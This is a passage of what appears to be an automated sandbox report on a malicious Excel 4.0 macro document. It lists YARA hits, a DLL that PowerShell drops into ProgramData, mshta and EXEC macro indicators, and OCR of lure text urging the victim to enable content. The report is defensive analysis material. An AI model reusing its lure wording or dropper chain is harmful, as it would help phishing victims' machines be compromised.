                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: CJ68000754184.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Source: CJ68000754184.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Document contains OLE streams with names of living off the land binaries
                            Source: CJ68000754184.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Source: CJ68000754184.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: CJ68000754184.xlsInitial sample: EXEC
                            Source: CJ68000754184.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00682051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006A0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00690001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00689011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006920BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006870B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00694116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006851BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006881B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00682251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00685361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00684346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006A13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006864E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00685548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00692550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00698519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006995FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00698606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006966CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00687735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00689714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00684816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00691889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00688969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006859F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006A09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00681A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00688B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00690B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00698BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00699BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00682BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00697BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00689B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00694B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00696C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00684C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00683C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00687C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006A0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00695CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00686D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00696DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00689DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00697DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00685E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00690E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006A0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00683E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00699EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00684EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0069DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0068CF47
